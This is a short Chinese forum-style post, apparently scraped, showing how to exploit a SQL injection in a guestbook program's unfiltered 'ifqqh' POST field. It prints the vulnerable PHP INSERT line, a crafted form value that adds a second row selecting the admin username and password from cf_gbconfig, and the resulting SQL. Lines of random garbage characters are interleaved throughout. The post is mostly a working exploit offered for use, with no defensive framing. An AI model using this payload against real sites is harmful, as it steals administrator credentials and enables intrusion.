留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。1 l' w) w$ F e) [
; b) A0 \+ p; l2 w3 H$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。1 m, @9 ?3 w8 R* B
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
3 d9 d' g4 t- R5 x% d& B$ m/ m+ x/ Y/ S1 Y
提交的时候把ifqqh的值改一下。变成
. ^& }; h& N+ J0 o" t6 @, {# }, `4 j/ O5 ^0 m9 ?# K+ d7 D
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
: j- ?, e& F/ z; z$ G. J& d
9 x4 }! ~. c: I9 B这样SQL插入语句就变了.5 C7 n( g( b/ D; n6 a
) w! ~. b* `. r8 }+ U/ ]insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
! M/ Z1 [+ I- I8 l
y0 V0 _: H; y% I+ F构造了另外一句SQL。并且把帐号密码读出来。
6 ]& ~" h0 c, o. H4 x" ^, W
! ~; Y. ?" ~6 y: B5 a9 q. c |